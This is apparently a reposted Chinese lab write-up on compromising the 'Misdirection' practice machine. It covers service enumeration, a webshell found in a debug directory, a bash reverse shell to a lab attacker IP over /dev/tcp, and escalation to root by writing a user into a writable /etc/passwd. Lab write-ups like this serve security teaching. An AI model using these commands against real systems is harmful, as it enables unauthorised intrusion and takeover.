misdirection综合靶机实战思路

admin 2025年4月7日00:44:59评论2 views字数 696阅读2分19秒阅读模式

确定靶机

靶机
攻击机
192.168.106.134
192.168.106.132
misdirection综合靶机实战思路

初步信息收集

端口/服务
对应信息
SSH(22)
OpenSSH 7.6p1
HTTP(80)
服务:Rocket httpd 1.2.6
mysql(3306)
???
HTTP(8080)
Apache httpd 2.4.29
内核
Linux 3.2 - 4.14
系统
ubbuntu
misdirection综合靶机实战思路

HTTP(80)信息收集

  • 存在注册框但是无法注册misdirection综合靶机实战思路

  • 存在开发文档misdirection综合靶机实战思路

  • 源代码页面misdirection综合靶机实战思路

  • 又一个开发文档。misdirection综合靶机实战思路

  • admin目录无法访问misdirection综合靶机实战思路

HTTP(8080)信息收集

  • 打开为默认的apache页面,尝试进行目录爆破,前面一堆空的路径和一个wordpress路径,获取站点指纹确定版本为5.2.1misdirection综合靶机实战思路

  • debug路径存在一个webshellmisdirection综合靶机实战思路

  • wordpress站点加载慢,暂时未发现可利用信息misdirection综合靶机实战思路

查找脆弱点

  • wordpress历史漏洞,尝试后暂为发现可利用的点。misdirection综合靶机实战思路

  • apache历史版本,暂未发现可利用的点misdirection综合靶机实战思路

  • debug目录反弹shell测试。

bash -c "bash -i >& /dev/tcp/192.168.106.132/1234 0>&1"
misdirection综合靶机实战思路

权限提升

当前已经获得了一个www-data的shell,需要进行权限提升

  • sudo -l发现存在一个用户的bash尝试获取misdirection综合靶机实战思路

  • 进去后发现是一个非交互试终端,尝试使用python来获取一个交互式终端。

python -c "import pty; pty.spawn('/bin/bash')"
misdirection综合靶机实战思路
  • 发现passwd权限不正常,正常的用户和组都是root用户。尝试写入一个用户测试misdirection综合靶机实战思路

  • 切换用户,直接是root用户的权限。misdirection综合靶机实战思路

原文始发于微信公众号(泷羽Sec-小篮子):misdirection综合靶机实战思路

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月7日00:44:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   misdirection综合靶机实战思路https://cn-sec.com/archives/3914597.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息